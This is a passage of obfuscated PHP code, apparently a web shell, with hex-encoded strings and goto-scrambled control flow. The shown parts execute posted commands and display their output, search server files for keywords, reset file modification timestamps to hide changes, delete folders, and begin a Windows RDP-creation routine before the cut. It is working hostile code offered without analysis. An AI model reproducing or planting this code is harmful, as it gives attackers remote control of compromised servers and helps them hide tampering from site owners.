"\74\x64\151\x76\x20\x63\x6c\141\163\163\x3d\x22\x63\157\x6e\164\x61\x69\156\x65\162\55\146\154\x75\151\144\x20\x6c\x61\156\x67\x75\x61\147\x65\x2d\152\x61\x76\x61\163\x63\162\151\x70\x74\x22\x3e\xa\x20\40\40\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\40\40\x3c\144\151\x76\x20\x63\x6c\x61\x73\x73\75\x22\x73\x68\145\154\x6c\x20\x6d\x62\x2d\63\x22\76\12\x20\x20\40\40\40\x20\x20\40\40\x20\40\40\x20\x20\x20\40\x20\x20\x20\x20\x3c\x70\162\x65\x20\163\164\x79\x6c\x65\x3d\42\x66\x6f\156\164\x2d\163\151\172\145\72\x31\x30\x70\x78\73\42\x3e\x24\46\x6e\142\x73\160\x3b\x3c\x72\x64\76" . htmlspecialchars($_POST["\x63\155\x64"], ENT_QUOTES, "\125\124\106\x2d\x38") . "\74\x2f\162\144\x3e\74\x62\x72\76\x3c\143\157\x64\x65\76" . htmlspecialchars($cmd, ENT_QUOTES, "\125\124\106\x2d\x38") . "\x3c\x2f\143\x6f\144\145\76\74\x2f\x70\162\145\x3e\12\x20\x20\40\x20\x20\x20\x20\40\40\40\40\x20\x20\40\x20\x20\74\x2f\x64\x69\166\76\xa\40\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\74\57\x64\x69\x76\76"; } elseif ($_SERVER["\122\105\x51\125\x45\x53\124\x5f\x4d\105\x54\110\117\104"] == "\x50\117\x53\x54") { echo "\xa\40\40\x20\x20\40\x20\x20\x20\40\40\40\x20\x3c\144\x69\166\x20\143\x6c\x61\x73\x73\75\x22\x63\x6f\x6e\x74\141\x69\x6e\x65\x72\55\x66\x6c\165\x69\144\x20\x6c\141\156\147\165\x61\x67\145\55\x6a\x61\x76\141\163\143\162\x69\160\164\x22\x3e\12\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\74\x64\151\x76\40\x63\x6c\141\163\x73\75\x22\163\150\145\x6c\x6c\40\x6d\x62\55\x33\x22\76\xa\40\40\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\40\x20\x20\40\74\x70\x72\145\x20\x73\x74\171\x6c\x65\x3d\x22\146\x6f\x6e\x74\x2d\163\x69\x7a\145\x3a\x31\60\160\x78\x3b\42\x3e\74\x63\157\144\x65\x3e\116\x6f\40\162\x65\163\165\154\x74\x3c\x2f\x63\x6f\144\x65\76\x3c\57\160\162\x65\76\12\x20\x20\40\40\x20\40\40\x20\40\40\x20\x20\x20\40\40\40\74\57\x64\x69\x76\76\xa\x20\40\x20\x20\40\40\x20\x20\40\40\x20\40\74\x2f\144\x69\x76\76\12\40\40\x20\40\x20\40\x20\40\74\57\x64\151\166\76"; } } goto FP6mR; xqoVY: if ($_1337["\x69\x64"] == "\x66\151\x6e\144\153\x65\171") { s(); echo "\x3c\144\x69\166\x20\x63\154\x61\x73\x73\75\x22\143\x6f\156\x74\x61\151\x6e\x65\162\55\x66\x6c\165\x69\144\x22\x3e\12\40\x20\40\x20\x3c\x63\145\156\x74\x65\x72\40\x63\x6c\141\x73\x73\x3d\42\x61\156\x75\x22\x3e\x46\151\x6e\144\40\106\x69\154\145\x20\125\x73\x69\156\x67\40\x4b\x65\171\x77\x6f\x72\144\x3c\x2f\x63\x65\156\164\x65\x72\x3e\xa\40\40\40\x20\x3c\144\151\x76\40\143\x6c\141\163\163\x3d\42\143\141\162\144\x20\x63\x61\162\144\55\x62\x6f\x64\171\x20\x74\x65\170\x74\x2d\144\x61\162\153\40\151\x6e\x70\x75\164\x2d\147\162\157\165\x70\x20\155\142\x2d\63\42\x3e\12\x20\40\x20\40\40\40\x20\40\74\x64\x69\x76\40\x63\154\x61\163\163\x3d\x22\143\x6f\x6e\164\141\x69\x6e\x65\162\x2d\x66\154\x75\x69\x64\x20\x6d\164\x2d\61\x22\76\12\x20\x20\x20\40\40\40\x20\40\40\40\40\40\74\x66\157\x72\x6d\x20\x6d\145\x74\x68\x6f\144\x3d\x22\x70\x6f\x73\x74\x22\x3e\xa\x20\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\x20\74\144\x69\166\x20\143\154\141\163\x73\x3d\x22\146\157\x72\155\55\x67\x72\157\x75\160\42\76\xa\40\x20\x20\40\40\40\40\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\40\x3c\x69\x20\143\154\x61\163\163\x3d\42\x62\x69\40\142\151\x2d\146\x6f\154\144\145\x72\42\x3e\74\x2f\151\x3e\x20\74\x6c\141\x62\145\154\40\146\157\162\75\x22\160\x61\x74\x68\x22\x3e\40\104\151\162\x65\143\x74\157\162\x79\72\x20\x3c\x2f\x6c\141\x62\x65\154\x3e\12\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\40\40\x20\40\x20\40\x20\x20\x20\x3c\x69\156\160\165\164\40\x74\x79\x70\145\x3d\42\x74\145\170\164\42\x20\x6e\141\x6d\x65\x3d\x22\x70\141\164\x68\42\40\x63\x6c\x61\163\x73\x3d\x22\x66\x6f\162\155\55\143\x6f\156\164\162\x6f\154\40\146\157\x72\155\55\143\157\x6e\x74\x72\157\154\55\163\155\40\164\145\x78\164\x2d\144\x61\162\x6b\x20\146\x6c\x65\170\55\x67\x72\157\x77\x2d\x31\x22\x20\x76\141\154\x75\145\x3d\x22" . $dir . "\57\x22\76\xa\x20\40\x20\40\40\x20\40\x20\x20\40\40\x20\40\40\40\40\x3c\x2f\x64\x69\166\76\xa\40\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\40\x20\x20\x20\x3c\x69\40\x63\154\141\163\163\x3d\x22\x62\151\x20\142\151\55\x73\145\x61\x72\x63\150\x22\x3e\x3c\57\x69\76\x20\74\154\x61\142\145\x6c\x20\x66\x6f\x72\x3d\x22\153\145\171\167\157\x72\x64\42\76\x20\113\145\x79\167\157\x72\144\72\40\74\57\154\141\142\x65\154\x3e\12\x20\40\40\40\40\40\x20\x20\40\40\40\x20\x20\x20\x20\40\74\x69\x6e\x70\x75\x74\40\164\171\x70\x65\75\42\x74\145\x78\x74\42\x20\156\x61\155\145\x3d\x22\x6b\145\x79\x77\157\162\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\157\162\155\55\143\x6f\156\x74\162\157\x6c\40\146\x6f\x72\155\55\x63\x6f\x6e\164\162\157\x6c\x2d\x73\x6d\x20\x74\145\170\x74\x2d\144\x61\x72\153\x20\x66\154\x65\x78\55\x67\x72\x6f\x77\x2d\61\42\40\x70\154\141\x63\x65\150\157\x6c\144\145\x72\x3d\42\145\x76\x61\x6c\54\x20\x70\150\160\151\x6e\146\157\40\145\x74\x63\56\x22\40\x72\145\161\165\x69\162\x65\x64\76\xa\xa\40\x20\40\x20\40\40\40\40\x20\x20\40\x20\40\40\40\40\x3c\144\x69\166\x20\143\154\141\x73\x73\x3d\42\151\x6e\160\165\x74\55\147\x72\157\x75\160\42\76\xa\40\40\40\40\40\x20\x20\x20\x20\40\40\40\40\x20\x20\40\74\151\x20\143\x6c\141\163\163\x3d\x22\142\x69\40\142\x69\55\146\151\x6c\145\55\145\141\162\155\x61\162\x6b\42\76\74\57\151\76\x20\x3c\x6c\141\x62\x65\154\40\x66\157\x72\75\42\x65\x78\164\145\x6e\x73\x69\157\156\42\76\40\46\156\x62\x73\x70\73\x45\x78\x74\145\156\163\151\x6f\x6e\72\x20\46\156\142\x73\x70\73\74\x2f\154\141\142\145\154\76\xa\x20\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\x20\x20\40\40\40\x3c\x64\x69\x76\x20\x63\154\x61\x73\x73\x3d\42\146\x6f\x72\155\x2d\x63\x68\x65\143\x6b\42\x3e\xa\40\40\x20\40\40\40\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x3c\x69\x6e\x70\x75\164\40\x63\154\141\x73\x73\x3d\x22\x66\x6f\x72\155\x2d\x63\x68\145\143\153\x2d\x69\156\160\x75\x74\42\40\164\171\160\145\75\x22\162\x61\x64\151\157\42\40\156\x61\155\145\75\42\145\x78\x74\x65\x6e\163\x69\157\x6e\x22\x20\x69\144\75\42\56\160\150\x70\42\40\x76\141\x6c\x75\x65\x3d\42\x2e\160\x68\160\42\x20\x63\x68\145\x63\153\145\144\x3e\12\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\40\40\40\x20\x20\40\40\74\154\141\142\145\154\40\x63\154\x61\x73\x73\75\x22\x66\x6f\x72\x6d\55\x63\x68\x65\143\x6b\55\x6c\141\142\x65\154\x22\x20\146\157\162\x3d\x22\x2e\160\150\160\42\x3e\40\x70\x68\160\46\x6e\x62\163\x70\73\x26\x6e\142\163\160\73\x20\74\x2f\154\x61\142\x65\154\x3e\12\x20\x20\40\x20\40\40\40\x20\40\40\40\x20\40\40\x20\40\40\x20\40\40\74\x2f\x64\x69\166\76\12\x20\x20\40\x20\40\x20\40\x20\40\x20\40\40\40\x20\40\x20\40\x20\40\40\x3c\144\151\166\x20\x63\x6c\x61\x73\x73\x3d\x22\146\157\162\155\x2d\x63\150\x65\x63\x6b\42\76\xa\x20\x20\40\x20\40\x20\40\40\40\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\40\40\40\x20\x3c\151\156\x70\165\164\40\143\x6c\x61\x73\x73\75\x22\x66\157\x72\x6d\x2d\x63\x68\x65\143\x6b\x2d\151\x6e\160\x75\x74\42\x20\164\171\160\x65\75\x22\162\141\x64\x69\157\42\x20\156\141\x6d\x65\x3d\42\x65\x78\x74\145\156\x73\x69\x6f\x6e\x22\x20\x69\144\x3d\42\x2e\150\164\x6d\154\42\x20\166\x61\x6c\x75\145\75\42\56\150\x74\x6d\154\x22\76\12\x20\x20\x20\40\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\40\40\40\x3c\154\x61\142\145\154\x20\x63\154\141\x73\x73\x3d\42\x66\x6f\162\x6d\55\x63\x68\x65\x63\x6b\55\x6c\141\x62\x65\154\x22\x20\x66\157\x72\75\x22\x2e\x68\x74\x6d\x6c\42\76\40\150\x74\155\x6c\46\x6e\142\163\x70\x3b\x26\156\142\163\x70\73\40\x3c\x2f\x6c\141\x62\145\x6c\76\xa\40\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\40\40\x20\x20\x20\40\74\57\x64\151\166\x3e\xa\x20\40\40\40\x20\40\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\x20\x20\74\144\151\166\40\x63\154\141\x73\163\x3d\42\x66\157\x72\x6d\55\143\x68\145\x63\153\42\76\xa\40\40\40\40\40\40\40\40\40\x20\40\x20\x20\x20\40\40\40\40\40\x20\x20\40\x20\40\x3c\151\x6e\x70\x75\164\40\x63\154\141\163\163\x3d\42\x66\157\x72\x6d\55\143\150\145\143\x6b\55\x69\156\160\x75\x74\x22\40\x74\171\x70\145\x3d\42\x72\x61\x64\x69\x6f\x22\x20\156\141\x6d\145\75\42\x65\x78\164\145\156\x73\151\157\x6e\42\40\x69\144\75\x22\x2e\164\x78\x74\42\x20\166\141\x6c\x75\x65\75\42\56\164\170\x74\42\76\12\x20\40\x20\40\40\x20\40\40\x20\40\x20\40\x20\x20\40\40\x20\40\40\40\x20\x20\40\x20\x3c\x6c\141\142\x65\154\40\143\154\x61\x73\163\75\42\x66\157\162\x6d\x2d\143\150\145\x63\x6b\x2d\x6c\x61\x62\145\x6c\x22\x20\x66\157\162\75\42\56\x74\170\x74\42\76\40\164\170\x74\x26\156\x62\x73\x70\x3b\x26\x6e\142\x73\x70\73\x20\74\57\154\x61\x62\x65\x6c\x3e\xa\x20\x20\x20\40\x20\40\40\x20\x20\40\40\40\x20\40\x20\40\x20\40\x20\40\74\57\144\x69\x76\x3e\xa\x20\x20\x20\x20\40\40\x20\40\x20\40\40\40\x20\x20\40\x20\40\40\x20\x20\74\144\151\166\40\143\x6c\x61\163\x73\x3d\42\x66\157\162\155\55\143\x68\145\143\x6b\42\76\xa\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\x20\40\40\x20\x20\40\x20\x20\40\x20\40\x20\74\x69\x6e\x70\x75\x74\x20\x63\154\x61\x73\163\x3d\42\146\157\162\155\x2d\x63\x68\x65\x63\153\55\151\156\x70\165\164\x22\40\x74\171\160\x65\x3d\42\162\141\x64\x69\157\x22\x20\156\141\x6d\x65\75\x22\x65\170\x74\145\x6e\163\151\157\156\42\40\151\144\75\42\141\154\x6c\42\x20\166\x61\x6c\x75\145\x3d\42\x61\x6c\x6c\x22\76\12\x20\x20\x20\40\40\x20\x20\40\40\40\x20\40\x20\40\40\x20\x20\x20\40\40\x20\40\x20\x20\x3c\x6c\141\142\145\x6c\x20\143\154\141\163\163\75\42\146\x6f\162\x6d\55\x63\150\145\x63\x6b\x2d\x6c\x61\142\145\x6c\42\x20\146\x6f\162\x3d\x22\x61\x6c\x6c\x22\x3e\40\101\x6c\154\x26\156\x62\163\160\73\40\x3c\x2f\x6c\x61\x62\145\154\76\12\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\40\40\x20\x20\x20\74\x2f\144\151\166\x3e\xa\x20\40\40\40\x20\x20\40\x20\x20\x20\40\40\40\40\x20\40\74\x2f\x64\x69\x76\76\xa\x20\40\x20\40\40\40\x20\x20\x20\40\40\40\40\40\x20\40\x3c\x64\x69\166\40\143\x6c\141\163\x73\x3d\x22\x64\x2d\147\162\151\144\40\147\141\160\x2d\62\42\76\xa\x20\40\40\40\40\x20\x20\x20\x20\40\40\40\x20\x20\x20\40\40\40\40\40\74\x69\156\x70\165\164\40\x63\x6c\x61\163\163\x3d\42\142\x74\x6e\x20\x62\x74\156\x2d\x64\141\162\x6b\40\142\164\x6e\x2d\x73\155\x22\x20\x74\x79\160\145\75\42\x73\x75\x62\155\151\164\x22\x20\156\141\155\145\75\42\x63\x75\x73\x74\x6f\155\x5f\145\170\164\145\x6e\163\x69\x6f\156\x22\40\166\x61\x6c\165\x65\x3d\x22\x53\165\142\155\x69\x74\41\42\x3e\xa\x20\x20\x20\40\40\x20\40\40\40\x20\40\x20\x20\40\40\40\x3c\x2f\x64\151\166\76\xa\40\40\x20\40\x20\40\40\40\x20\x20\x20\x20\74\57\146\157\x72\155\x3e\xa\40\40\40\40\40\x20\40\40\74\57\x64\x69\166\76\xa\40\40\40\40\74\x2f\144\151\x76\x3e"; if ($_SERVER["\122\105\x51\125\x45\x53\x54\137\x4d\105\124\110\x4f\x44"] == "\x50\x4f\x53\124") { $keyword = $_POST["\x6b\145\x79\x77\157\x72\144"]; $path = isset($_POST["\160\141\164\150"]) ? $_POST["\160\141\164\150"] : "\56"; $extension = $_POST["\x65\170\x74\x65\156\x73\x69\157\156"]; if ($extension === "\x61\154\x6c") { $files = glob("{$path}\x2f\x2a"); } else { $files = glob("{$path}\x2f\52{$extension}"); } $matching_files = array(); foreach ($files as $file) { if (is_file($file) && strpos(file_get_contents($file), $keyword) !== false) { $matching_files[] = $file; } } if (!empty($matching_files)) { echo "\74\x64\x69\166\x20\143\x6c\141\163\163\x3d\42\143\141\x72\144\40\143\x61\162\x64\x2d\142\x6f\x64\171\x20\x74\x65\x78\x74\55\x64\x61\162\x6b\42\x3e\123\x65\141\x72\143\x68\151\x6e\147\x20" . $keyword . "\40\157\x6e\x20" . $extension . "\40\x65\170\x74\x65\156\163\151\157\156\56\74\165\154\76"; foreach ($matching_files as $matching_file) { echo "\x3c\x6c\151\x3e" . $matching_file . "\74\x2f\x6c\151\x3e"; } echo "\74\57\x75\154\x3e\x3c\57\x64\151\166\x3e"; } else { echo "\x3c\x70\76\x4e\157\x20\x6d\141\x74\143\x68\151\156\x67\40\x66\151\154\145\x73\40\146\157\x75\x6e\144\x2e\x3c\x2f\160\x3e"; } } } goto huGM_; YFNC7: if ($_1337["\x61\x63\x74\151\x6f\156"] == "\x63\150\x61\x6e\x67\x65\155\157\144\151\x66\151\145\144") { s(); function changeDate($itemPath, $newDate) { if (is_file($itemPath) || is_dir($itemPath)) { if (touch($itemPath, strtotime($newDate))) { return true; } else { return false; } } return false; } $currentTime = microtime(true); $microseconds = sprintf("\45\60\66\x64", ($currentTime - floor($currentTime)) * 1000000); $dateTimeWithMicroseconds = date("\131\55\155\x2d\144\40\x48\72\x69\x3a\163\x2e", $currentTime) . $microseconds; $itemToChangeDate = $_GET["\x6f\x70\156"]; $itemPathToChangeDate = $path . "\57" . $itemToChangeDate; echo "\74\144\x69\166\x20\x63\154\x61\x73\x73\x3d\47\x62\164\156\x2d\147\x72\x6f\x75\160\x27\76\xa\74\x61\40\143\154\x61\163\163\x3d\x27\x62\164\x6e\x20\x62\164\156\x2d\x6f\x75\164\x6c\x69\156\145\x2d\154\x69\x67\150\164\x20\142\x74\x6e\x2d\x73\x6d\x27\x20\150\162\145\146\75\x27\77\144\151\x72\x3d{$path}\x26\x61\x63\x74\x69\x6f\156\x3d\166\x69\x65\x77\46\157\160\x6e\x3d{$file}\x27\76\x3c\151\x20\x63\x6c\x61\163\x73\x3d\x27\142\151\40\142\151\x2d\x65\171\x65\x27\x3e\74\x2f\151\76\x3c\57\141\x3e\12\x3c\141\x20\x63\154\141\163\163\75\47\x62\164\156\40\x62\164\156\x2d\x6f\x75\164\x6c\x69\x6e\x65\x2d\x6c\151\147\150\164\x20\x62\164\x6e\x2d\x73\155\47\40\x68\162\145\146\75\x27\x3f\144\x69\162\x3d{$path}\46\x61\x63\x74\151\157\x6e\x3d\145\144\151\x74\x26\157\160\156\75{$file}\47\x3e\74\x69\40\x63\154\141\x73\x73\75\x27\142\x69\40\142\151\x2d\x70\145\x6e\x63\x69\x6c\55\163\x71\165\141\x72\145\x27\76\x3c\57\x69\x3e\x3c\57\141\76\xa\x3c\141\40\143\x6c\x61\163\x73\x3d\x27\142\164\156\40\142\164\x6e\x2d\x6f\165\x74\x6c\151\156\145\55\154\x69\147\150\164\40\x62\164\156\x2d\163\x6d\47\40\x68\162\145\146\x3d\47\77\144\x69\x72\75{$path}\x26\141\143\164\151\157\x6e\75\x72\145\x6e\141\x6d\145\46\x6f\160\x6e\x3d{$file}\x27\x3e\x3c\x69\x20\x63\154\x61\163\x73\75\47\142\x69\x20\x62\x69\x2d\160\x65\156\143\x69\x6c\x2d\146\x69\154\154\x27\x3e\x3c\57\x69\76\x3c\57\x61\76\xa\x3c\x61\40\x63\154\141\x73\x73\x3d\47\x62\164\156\x20\142\x74\x6e\x2d\157\165\x74\154\x69\156\145\55\154\151\x67\x68\x74\x20\142\164\156\x2d\x73\155\x27\40\x68\x72\x65\146\75\47\x3f\144\x69\162\75{$path}\46\141\x63\164\151\157\x6e\75\x63\x68\x61\156\x67\x65\155\157\x64\151\146\151\145\x64\x26\157\160\156\x3d{$file}\47\76\74\x69\x20\143\x6c\141\163\x73\x3d\x27\x62\x69\40\x62\x69\55\143\x61\154\x65\156\x64\x61\162\x2d\144\141\x74\x65\x27\x3e\74\x2f\x69\76\x3c\57\141\76\12\74\141\40\143\154\x61\x73\163\x3d\x27\x62\164\156\40\x62\x74\x6e\55\157\165\x74\x6c\x69\x6e\145\55\154\x69\147\x68\164\40\x62\164\x6e\55\x73\x6d\x27\40\x68\x72\x65\x66\75\47\77\x64\151\162\75{$path}\46\x61\143\x74\151\x6f\x6e\x3d\143\150\145\155\157\x64\46\157\x70\x6e\x3d{$file}\47\x3e\x3c\151\x20\x63\154\x61\x73\163\75\47\142\x69\x20\x62\x69\55\146\x69\x6c\x65\x2d\145\141\162\x6d\141\162\x6b\x2d\155\145\144\x69\x63\x61\154\47\x3e\x3c\x2f\151\76\74\x2f\141\76\xa\74\x61\40\x63\154\x61\x73\163\x3d\x27\142\x74\x6e\x20\142\164\x6e\55\x6f\165\164\154\151\x6e\x65\55\144\x61\x6e\x67\145\162\x20\142\x74\x6e\55\163\155\x27\x20\x68\x72\145\146\x3d\x27\x3f\144\x69\162\75{$path}\46\x61\143\164\x69\x6f\x6e\x3d\144\x65\154\145\164\x65\x5f\146\151\x6c\145\46\x6f\x70\156\x3d{$file}\x27\76\x3c\x69\40\143\154\141\x73\x73\x3d\47\x62\151\40\142\151\55\x74\162\141\x73\150\x2d\146\151\x6c\154\x27\x3e\74\x2f\x69\x3e\74\57\x61\x3e\xa\x3c\57\x64\151\166\x3e\xa\74\142\x72\76\x3c\x69\x20\143\x6c\x61\163\x73\x3d\47\x62\x69\x20" . (is_dir($itemPathToChangeDate) ? "\142\151\55\146\157\x6c\x64\145\x72" : "\142\151\x2d\x66\151\154\x65\55\x65\x61\x72\155\x61\x72\x6b") . "\47\x3e\x3c\x2f\x69\76\72\46\156\x62\x73\x70\73" . basename($itemPathToChangeDate) . "\x3c\x2f\142\162\x3e\12\74\x66\x6f\162\155\x20\155\145\164\150\157\x64\75\47\x50\117\x53\124\47\x3e\x3c\x64\x69\166\x20\143\x6c\141\x73\x73\x3d\x27\x69\x6e\x70\165\x74\x2d\x67\162\x6f\165\160\x27\x3e\74\x69\x6e\x70\x75\x74\x20\143\x6c\141\x73\163\x3d\x27\x66\157\x72\x6d\x2d\x63\x6f\x6e\x74\x72\157\x6c\40\x62\x74\156\55\163\155\x27\40\x74\x79\160\145\x3d\x27\164\x65\x78\164\47\x20\x6e\x61\155\145\75\x27\x6e\x65\167\x5f\144\x61\164\x65\47\x20\x76\x61\x6c\x75\x65\75\47" . $dateTimeWithMicroseconds . "\x27\x20{$_r}\76\12\x3c\x62\x75\x74\164\157\156\x20\143\154\x61\163\163\x3d\47\x62\x74\x6e\40\142\164\x6e\x2d\x6f\x75\x74\x6c\x69\x6e\145\55\x6c\x69\147\150\x74\x20\142\164\x6e\x2d\x73\155\x27\40\164\171\x70\145\x3d\47\163\x75\155\x62\x69\164\47\x20\156\x61\x6d\x65\x3d\47\x63\150\x61\x6e\x67\145\155\157\x64\x69\x66\x69\145\144\47\x3e\74\151\40\x63\154\x61\x73\163\75\x27\x62\x69\x20\x62\151\x2d\145\x6d\x6f\x6a\151\55\163\x6d\151\154\145\55\x75\x70\163\151\144\145\55\144\x6f\x77\x6e\x27\76\74\x2f\x69\76\x3c\57\x62\165\x74\x74\x6f\x6e\76\xa\74\57\144\x69\x76\76\xa\74\57\146\x6f\162\x6d\x3e"; if (isset($_POST["\x63\x68\141\x6e\147\145\155\157\x64\x69\x66\151\x65\x64"])) { $newDate = $_POST["\156\145\x77\x5f\x64\141\x74\x65"]; if (changeDate($itemPathToChangeDate, $newDate)) { echo "\74\163\164\162\x6f\156\x67\x3e\x43\150\141\156\147\x65\x20\x44\x61\x74\x65\74\x2f\163\x74\162\157\156\x67\x3e\x20\x4f\x4b\41\40" . ok() . "\x3c\x2f\x64\151\x76\x3e"; } else { echo "\x3c\163\x74\162\x6f\156\147\76\103\x68\x61\x6e\x67\x65\40\104\x61\x74\x65\x3c\57\163\x74\162\x6f\156\147\x3e\40\106\x41\x49\114\x21\x20" . er() . "\x3c\x2f\144\x69\x76\76"; } } } goto O0lrs; SZTWR: error_reporting(0); goto LZ0AL; MxyOS: if ($_1337["\x61\143\x74\151\x6f\x6e"] == "\x64\x65\154\145\x74\x65\x5f\146\x6f\x6c\x64\x65\x72") { s(); if ($_1337["\x79\x65\x61\150"]) { if (is_dir($dir)) { if (is_writable($dir)) { if (deleteDir($dir)) { echo "\74\163\x74\x72\157\156\x67\76\104\145\x6c\x65\x74\145\40\146\x6f\x6c\x64\x65\x72\74\57\163\x74\162\x6f\156\147\76\40\117\113\x21\x20" . ok() . "\74\141\40\x63\154\x61\x73\163\x3d\x22\142\x74\156\x2d\x63\x6c\x6f\163\x65\x22\40\150\162\145\146\x3d\x22\x3f\160\141\164\x68\x3d" . dirname($dir) . "\x22\76\x3c\x2f\x61\76\x3c\x2f\144\x69\166\76"; } else { echo "\74\x73\164\x72\x6f\156\x67\76\104\145\154\x65\x74\x65\40\146\157\154\x64\x65\x72\74\x2f\x73\164\x72\x6f\x6e\147\x3e\40\x46\101\111\114\x21\40" . er() . "\74\x61\40\143\x6c\141\163\x73\x3d\42\x62\164\x6e\55\x63\154\157\x73\145\42\x20\150\162\145\146\75\x22\77\160\141\164\150\x3d" . dirname($dir) . "\42\x3e\74\x2f\141\x3e\x3c\x2f\144\x69\166\x3e"; } } else { echo "\x3c\163\x74\162\x6f\x6e\x67\x3e\x44\145\154\x65\x74\145\40\146\157\154\144\145\x72\74\57\x73\164\162\157\156\147\76\x20\x46\101\111\114\41\x20" . er() . "\74\x61\x20\143\154\x61\x73\x73\75\42\142\x74\x6e\55\x63\x6c\157\x73\145\x22\40\150\x72\x65\x66\x3d\x22\x3f\160\141\x74\150\75" . dirname($dir) . "\x22\x3e\74\57\141\x3e\x3c\x2f\144\151\x76\x3e"; } } } echo "\x3c\144\151\166\x20\143\154\141\163\163\75\x27\x62\x74\x6e\x2d\147\162\x6f\165\160\40\155\x62\x2d\63\47\x3e\12\x3c\141\x20\143\x6c\x61\x73\x73\x3d\x27\142\x74\156\40\x62\164\156\55\x6f\165\164\154\151\156\x65\x2d\154\x69\x67\x68\164\x20\x62\164\x6e\x2d\163\155\47\x20\x68\162\145\146\x3d\47\77\144\x69\x72\75{$path}\x26\x61\x63\164\x69\x6f\x6e\x3d\162\145\x6e\141\155\x65\x5f\146\x6f\154\x64\145\162\x27\76\x3c\x69\x20\x63\x6c\141\x73\163\x3d\47\x62\151\x20\142\x69\x2d\x70\x65\x6e\143\x69\x6c\x2d\146\151\x6c\x6c\47\x3e\x3c\57\x69\x3e\74\57\141\76\xa\x3c\141\40\143\x6c\141\x73\163\75\47\142\164\156\x20\x62\164\156\x2d\x6f\165\x74\154\151\156\x65\55\x6c\x69\x67\150\x74\x20\x62\164\x6e\x2d\x73\155\47\40\x68\162\145\146\x3d\47\x3f\144\151\x72\75{$path}\x26\141\143\x74\151\157\x6e\x3d\143\150\141\x6e\147\145\155\x6f\x64\151\146\x69\145\144\137\146\157\x6c\144\145\x72\x27\76\74\151\40\x63\154\x61\163\x73\75\x27\x62\151\x20\142\x69\55\143\x61\x6c\145\x6e\x64\141\x72\55\x64\x61\x74\145\47\76\x3c\57\151\x3e\74\x2f\x61\76\12\x3c\x21\x2d\x2d\74\x61\40\x63\154\141\x73\x73\75\x27\x62\164\156\40\x62\x74\x6e\55\157\165\164\154\x69\x6e\x65\55\x6c\x69\147\150\x74\40\x62\164\156\x2d\163\x6d\47\x20\x68\x72\x65\146\75\47\77\x64\151\x72\x3d{$path}\46\x61\x63\x74\x69\157\x6e\75\143\150\145\155\157\x64\x27\x3e\x3c\151\40\143\x6c\141\163\163\x3d\x27\x62\x69\x20\x62\x69\x2d\x66\x69\154\x65\55\x65\141\x72\x6d\141\x72\x6b\55\155\x65\x64\151\143\x61\x6c\x27\x3e\x3c\57\151\76\74\57\x61\x3e\55\55\76\12\x3c\x61\x20\143\154\141\x73\163\75\47\142\164\156\40\x62\164\156\x2d\x6f\x75\x74\154\x69\x6e\145\55\144\x61\156\x67\145\x72\x20\x62\x74\x6e\x2d\x73\x6d\47\x20\150\162\145\x66\x3d\47\x3f\x64\151\162\x3d{$path}\x26\x61\x63\164\151\157\x6e\x3d\144\145\154\x65\164\x65\137\146\x6f\154\x64\145\x72\x27\76\74\x69\x20\143\x6c\x61\163\x73\75\47\x62\151\x20\142\x69\x2d\x74\162\141\x73\x68\x2d\146\x69\x6c\154\x27\76\74\57\151\76\x3c\57\141\76\12\x3c\x2f\144\151\x76\76\74\144\x69\166\40\x63\x6c\x61\x73\163\x3d\x27\143\x61\x72\x64\40\143\141\162\x64\x2d\x62\x6f\144\171\x20\164\145\170\164\x2d\144\141\x72\153\40\x69\156\x70\165\x74\x2d\x67\x72\x6f\x75\x70\40\155\142\55\63\47\76\xa\11\x9\x9\74\160\x3e\x41\x72\145\x20\x79\x6f\165\x20\163\165\162\145\x20\164\157\x20\x64\x65\x6c\145\x74\x65\40\x3a\40" . basename($dir) . "\40\77\74\x2f\160\x3e\12\x9\11\x9\x3c\x66\157\x72\x6d\40\x6d\145\x74\x68\x6f\x64\75\47\x50\117\x53\124\47\x3e\12\x9\x9\11\11\74\141\x20\143\x6c\141\163\163\75\x27\142\x74\156\40\142\164\x6e\55\x64\141\x72\x6b\x20\142\164\156\55\x62\154\157\x63\153\40\x62\164\x6e\x2d\x73\x6d\x27\40\150\x72\x65\x66\x3d\x27\77\x64\x69\x72\x3d" . dirname($dir) . "\47\x3e\x4e\157\x3c\57\x61\x3e\12\x9\11\11\x9\74\x69\x6e\x70\165\x74\x20\164\171\160\x65\x3d\x27\163\165\x62\155\151\164\47\40\x6e\x61\x6d\x65\75\x27\171\x65\x61\x68\x27\40\143\154\x61\163\163\75\x27\x62\164\156\40\x62\x74\x6e\x2d\x73\165\143\143\x65\163\163\40\x62\164\156\55\142\154\157\x63\153\x20\142\x74\x6e\55\x73\155\47\40\x76\141\154\165\x65\x3d\x27\x59\x65\x73\x27\76\12\x9\11\x9\74\x2f\x66\157\x72\x6d\x3e\12\11\x9\74\57\x64\x69\x76\x3e"; } goto brEKJ; R4x76: for ($i = 0; $i <= $c_dir; $i++) { $scdir[$i]; if ($i != $c_dir) { } if ($_1337["\x69\x64"] == "\162\x64\160") { ob_implicit_flush(); ob_end_flush(); if (strtoupper(substr(PHP_OS, 0, 3)) === "\x57\111\116") { echo "\74\x63\145\156\164\x65\x72\x20\x63\154\141\163\x73\75\42\141\x6e\165\42\76\103\x72\145\141\164\x65\x20\122\x44\x50\x20\x28\127\151\156\x64\157\x77\x73\40\123\145\x72\166\145\162\51\x3c\57\143\x65\156\x74\x65\162\x3e"; echo 